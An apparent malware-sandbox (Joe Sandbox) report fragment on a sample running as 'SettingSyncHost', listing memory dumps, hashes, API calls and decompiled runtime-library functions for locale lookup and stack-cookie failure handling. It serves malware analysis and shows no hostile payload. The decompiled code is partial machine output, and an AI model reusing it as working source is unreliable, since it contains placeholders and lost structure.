                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                                                                                                                      • String ID: utf8
                                                                                                                                      • API String ID: 4147378913-905460609
                                                                                                                                      • Opcode ID: 743f63fe6a930b5645a7bd844ada899ce04c68cdbf497b52e5e022d26d1b83b1
                                                                                                                                      • Instruction ID: fa07e2a19c42b2544dbb2496a1c6e25027ab5f190cff1eb81d33aa0468ea9af4
                                                                                                                                      • Opcode Fuzzy Hash: 743f63fe6a930b5645a7bd844ada899ce04c68cdbf497b52e5e022d26d1b83b1
                                                                                                                                      • Instruction Fuzzy Hash: 777105716003A6AADB27AB36CC46BBB73A8EF44740F154629F905DF5C1EB70ED408760
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003F170D, Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1427COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __floor_pentium4
                                                                                                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                      • API String ID: 4168288129-2761157908
                                                                                                                                      • Opcode ID: 1380290381dfa74862a2a8a953a8ea7c4a02851008230a4003791ff135ef0d28
                                                                                                                                      • Instruction ID: 8e8876585f2a3192a7164891f8e2f219964f2a430d1d1f3f63ab18d5ede3bbbb
                                                                                                                                      • Opcode Fuzzy Hash: 1380290381dfa74862a2a8a953a8ea7c4a02851008230a4003791ff135ef0d28
                                                                                                                                      • Instruction Fuzzy Hash: 2AD23971E0862CCBDB66CE28DD407EAB7B9EB44305F1545EAD90DE7240E778AE818F41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003EE499, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,2000000B,003EE7B7,00000002,00000000,?,?,?,003EE7B7,?,00000000), ref: 003EE532
                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,20001004,003EE7B7,00000002,00000000,?,?,?,003EE7B7,?,00000000), ref: 003EE55B
                                                                                                                                      • GetACP.KERNEL32(?,?,003EE7B7,?,00000000), ref: 003EE570
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InfoLocale
                                                                                                                                      • String ID: ACP$OCP
                                                                                                                                      • API String ID: 2299586839-711371036
                                                                                                                                      • Opcode ID: f07db39ec08936809e5172fc39cb17721d412dfd65a99729bae7c07d48a91225
                                                                                                                                      • Instruction ID: 4d234f44f97ad34590e76e9f7ad430fb2c6257c9a0aee975065c5b5cfae29069
                                                                                                                                      • Opcode Fuzzy Hash: f07db39ec08936809e5172fc39cb17721d412dfd65a99729bae7c07d48a91225
                                                                                                                                      • Instruction Fuzzy Hash: A1210322B001A4A6DB378F17C900AA773AAEF51B68F578664E906DB2D1F732CE40C750
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 0039AC3E, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                      			E0039AC3E(void* __edi, char* __esi) {
				short _v8;
				void* _t24;

				_t24 = __edi;
				if(__esi == 0 ||  *__esi == 0 || E0039AB40(__esi, ?str?) == 0) {
					if(GetLocaleInfoW( *(_t24 + 0x1c), 0x20001004,  &_v8, 2) != 0) {
						if(_v8 != 0) {
							goto L5;
						} else {
							return GetACP();
						}
					} else {
						goto L8;
					}
				} else {
					if(E0039AB40(__esi, ?str?) != 0) {
						_v8 = E003A2D16(__esi);
						goto L5;
					} else {
						if(GetLocaleInfoW( *(__edi + 0x1c), 0x2000000b,  &_v8, 2) == 0) {
							L8:
							return 0;
						} else {
							L5:
							return _v8;
						}
					}
				}
			}





                                                                                                                                      0x0039ac3e
                                                                                                                                      0x0039ac46
                                                                                                                                      0x0039acae
                                                                                                                                      0x0039acb8
                                                                                                                                      0x00000000
                                                                                                                                      0x0039acba
                                                                                                                                      0x0039acc1
                                                                                                                                      0x0039acc1
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039ac5e
                                                                                                                                      0x0039ac6d
                                                                                                                                      0x0039ac93
                                                                                                                                      0x00000000
                                                                                                                                      0x0039ac6f
                                                                                                                                      0x0039ac85
                                                                                                                                      0x0039acb0
                                                                                                                                      0x0039acb3
                                                                                                                                      0x0039ac87
                                                                                                                                      0x0039ac87
                                                                                                                                      0x0039ac8b
                                                                                                                                      0x0039ac8b
                                                                                                                                      0x0039ac85
                                                                                                                                      0x0039ac6d

                                                                                                                                      APIs
                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,?,?,0039B2A7,?,00394307,?,000000BC,?,00000001,00000000,00000000), ref: 0039AC7D
                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,?,?,0039B2A7,?,00394307,?,000000BC,?,00000001,00000000,00000000), ref: 0039ACA6
                                                                                                                                      • GetACP.KERNEL32(?,?,0039B2A7,?,00394307,?,000000BC,?,00000001,00000000), ref: 0039ACBA
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InfoLocale
                                                                                                                                      • String ID: ACP$OCP
                                                                                                                                      • API String ID: 2299586839-711371036
                                                                                                                                      • Opcode ID: 7607ea7318fe8b7a124ec28ea5eb8d1c9d2a7684294df25f22c8ab00abc6da6f
                                                                                                                                      • Instruction ID: 26a82969f8a69896cb7103617d576bae26734736bb218f1774b40718c8c19805
                                                                                                                                      • Opcode Fuzzy Hash: 7607ea7318fe8b7a124ec28ea5eb8d1c9d2a7684294df25f22c8ab00abc6da6f
                                                                                                                                      • Instruction Fuzzy Hash: 4501D430605A07BBEF239B55AD05FAA77E8AF41314F210254F101EA0C2EB70DE41DBD6
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003EE66E, Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 003E5A10: GetLastError.KERNEL32(?,?,?,003DE7AE,?,?,00000000,?,003DE33E,?,?,?), ref: 003E5A15
                                                                                                                                        • Part of subcall function 003E5A10: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00000000,?,003DE33E,?,?,?), ref: 003E5AB3
                                                                                                                                        • Part of subcall function 003E5A10: _free.LIBCMT ref: 003E5A72
                                                                                                                                        • Part of subcall function 003E5A10: _free.LIBCMT ref: 003E5AA8
                                                                                                                                      • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 003EE77A
                                                                                                                                      • IsValidCodePage.KERNEL32(00000000), ref: 003EE7C3
                                                                                                                                      • IsValidLocale.KERNEL32(?,00000001), ref: 003EE7D2
                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 003EE81A
                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 003EE839
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 949163717-0
                                                                                                                                      • Opcode ID: 7a6ee20acc3eb0312ec8960c58515dc061b45c3d574e7ba24df084edd803b403
                                                                                                                                      • Instruction ID: 20e949784b7f0779aa641dce0d1a4e95d8c508017c5c8dd5766a065c493cb068
                                                                                                                                      • Opcode Fuzzy Hash: 7a6ee20acc3eb0312ec8960c58515dc061b45c3d574e7ba24df084edd803b403
                                                                                                                                      • Instruction Fuzzy Hash: 0251AF71A00269ABDF12DFA6CC45ABE77B8FF58700F050629E911EB1D0EB709944CB61
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00393C21, Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      C-Code - Quality: 85%
                                                                                                                                      			E00393C21(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x3c7040; // 0xbb40e64e
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x4ed9a0 = _t6;
				 *0x4ed99c = _t22;
				 *0x4ed998 = _t25;
				 *0x4ed994 = _t21;
				 *0x4ed990 = _t27;
				 *0x4ed98c = _t26;
				 *0x4ed9b8 = ss;
				 *0x4ed9ac = cs;
				 *0x4ed988 = ds;
				 *0x4ed984 = es;
				 *0x4ed980 = fs;
				 *0x4ed97c = gs;
				asm("pushfd");
				_pop( *0x4ed9b0);
				 *0x4ed9a4 =  *_t31;
				 *0x4ed9a8 = _v0;
				 *0x4ed9b4 =  &_a4;
				 *0x4ed8f0 = 0x10001;
				 *0x4ed8a4 =  *0x4ed9a8;
				 *0x4ed898 = 0xc0000409;
				 *0x4ed89c = 1;
				_t12 =  *0x3c7040; // 0xbb40e64e
				_v812 = _t12;
				_t13 =  *0x3c7044; // 0x44bf19b1
				_v808 = _t13;
				 *0x4ed8e8 = IsDebuggerPresent();
				_push(1);
				E003A1C07(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x3bfeb8);
				if( *0x4ed8e8 == 0) {
					_push(1);
					E003A1C07(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}


















                                                                                                                                      0x00393c21
                                                                                                                                      0x00393c21
                                                                                                                                      0x00393c21
                                                                                                                                      0x00393c21
                                                                                                                                      0x00393c21
                                                                                                                                      0x00393c21
                                                                                                                                      0x00393c21
                                                                                                                                      0x00393c27
                                                                                                                                      0x00393c29
                                                                                                                                      0x00393c29
                                                                                                                                      0x003977de
                                                                                                                                      0x003977e3
                                                                                                                                      0x003977e9
                                                                                                                                      0x003977ef
                                                                                                                                      0x003977f5
                                                                                                                                      0x003977fb
                                                                                                                                      0x00397801
                                                                                                                                      0x00397808
                                                                                                                                      0x0039780f
                                                                                                                                      0x00397816
                                                                                                                                      0x0039781d
                                                                                                                                      0x00397824
                                                                                                                                      0x0039782b
                                                                                                                                      0x0039782c
                                                                                                                                      0x00397835
                                                                                                                                      0x0039783d
                                                                                                                                      0x00397845
                                                                                                                                      0x00397850
                                                                                                                                      0x0039785f
                                                                                                                                      0x00397864
                                                                                                                                      0x0039786e
                                                                                                                                      0x00397878
                                                                                                                                      0x0039787d
                                                                                                                                      0x00397883
                                                                                                                                      0x00397888
                                                                                                                                      0x00397894
                                                                                                                                      0x00397899
                                                                                                                                      0x0039789b
                                                                                                                                      0x003978a3
                                                                                                                                      0x003978ae
                                                                                                                                      0x003978bb
                                                                                                                                      0x003978bd
                                                                                                                                      0x003978bf
                                                                                                                                      0x003978c4
                                                                                                                                      0x003978d8

                                                                                                                                      APIs
                                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 0039788E
                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 003978A3
                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(003BFEB8), ref: 003978AE
                                                                                                                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 003978CA
                                                                                                                                      • TerminateProcess.KERNEL32(00000000), ref: 003978D1
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2579439406-0
                                                                                                                                      • Opcode ID: f4f5f6e2eae4fb85b456ad6acc76be4ce5a33296c9ec7a5f56e147af6db274bd
                                                                                                                                      • Instruction ID: 28adabd3b7f021eb6c887f4974a449c986645d037c58346cc83cb6ae3bc1a375
                                                                                                                                      • Opcode Fuzzy Hash: f4f5f6e2eae4fb85b456ad6acc76be4ce5a33296c9ec7a5f56e147af6db274bd
                                                                                                                                      • Instruction Fuzzy Hash: F321CAB9806284DFDB41EF28EC89A643BF4FB48315F11107AE8588F263E7B55980CF19
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003E40F0, Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 450COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: b)?$b)?
                                                                                                                                      • API String ID: 0-347368682
                                                                                                                                      • Opcode ID: 0472578c0b215b984978c490097d9856b7071904912d50344a368866e0e2dea7
                                                                                                                                      • Instruction ID: 42ebcbecc6eeb58869eb655d5fbd71bf987a6b19910dfa7ece792d77b9454ba0
                                                                                                                                      • Opcode Fuzzy Hash: 0472578c0b215b984978c490097d9856b7071904912d50344a368866e0e2dea7
                                                                                                                                      • Instruction Fuzzy Hash: 02F14F71E002699FDF15CFA9D8806ADBBB1FF88314F158269E915AB384D731AD41CF90
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003D9957, Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 003D9963
                                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 003D9A2F
                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 003D9A4F
                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 003D9A59
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 254469556-0
                                                                                                                                      • Opcode ID: 2b45c799e118a6a200ea030c57e30b3da0d54bb63d7625d515a66dffe420b4e2
                                                                                                                                      • Instruction ID: d44d036f4b86c6848abc16fbb13f6434ca0dc39151970071b7b5736f3d2a0cee
                                                                                                                                      • Opcode Fuzzy Hash: 2b45c799e118a6a200ea030c57e30b3da0d54bb63d7625d515a66dffe420b4e2
                                                                                                                                      • Instruction Fuzzy Hash: 9631FA75D0521C9BDB21DF64D9497DDBBB8AF04300F10419AE40DAB250EB719A85CF55
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003EE120, Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 003E5A10: GetLastError.KERNEL32(?,?,?,003DE7AE,?,?,00000000,?,003DE33E,?,?,?), ref: 003E5A15
                                                                                                                                        • Part of subcall function 003E5A10: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00000000,?,003DE33E,?,?,?), ref: 003E5AB3
                                                                                                                                        • Part of subcall function 003E5A10: _free.LIBCMT ref: 003E5A72
                                                                                                                                        • Part of subcall function 003E5A10: _free.LIBCMT ref: 003E5AA8
                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 003EE174
                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 003EE1BE
                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 003EE284
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InfoLocale$ErrorLast_free
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3140898709-0
                                                                                                                                      • Opcode ID: 312c541c0a3257b2c03d60cba42ad671f4a48792f830fe9c78b977caa1acee8e
                                                                                                                                      • Instruction ID: 941bbfeda4f4dedf00e49acc98f78883cab8493d41f0c5e06e212653258b5149
                                                                                                                                      • Opcode Fuzzy Hash: 312c541c0a3257b2c03d60cba42ad671f4a48792f830fe9c78b977caa1acee8e
                                                                                                                                      • Instruction Fuzzy Hash: B061A0715001679FDF2AAF26CD82BBA77A9FF04300F15467AEA15CA6C1E734D984CB50
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003DE083, Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 003DE17B
                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 003DE185
                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 003DE192
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3906539128-0
                                                                                                                                      • Opcode ID: e93bb7ec4ada899ea0afb36970dab10a6e40223b75fcb0c22b1d29c077c27750
                                                                                                                                      • Instruction ID: df16d8b61c3a3a4a3ad48d98f8e7b741bbae2433cd066e666cc52ac11944bdc0
                                                                                                                                      • Opcode Fuzzy Hash: e93bb7ec4ada899ea0afb36970dab10a6e40223b75fcb0c22b1d29c077c27750
                                                                                                                                      • Instruction Fuzzy Hash: 6D31A67591121C9BCB22DF64E989B9DBBB8BF08310F5041EAE41CAB250EB709F858F55
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003E105A, Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetCurrentProcess.KERNEL32(?,?,003E1059,?,?,?,?,?,003DE33E), ref: 003E107C
                                                                                                                                      • TerminateProcess.KERNEL32(00000000,?,003E1059,?,?,?,?,?,003DE33E), ref: 003E1083
                                                                                                                                      • ExitProcess.KERNEL32 ref: 003E1095
                                                                                                                                      Memory Dump Source
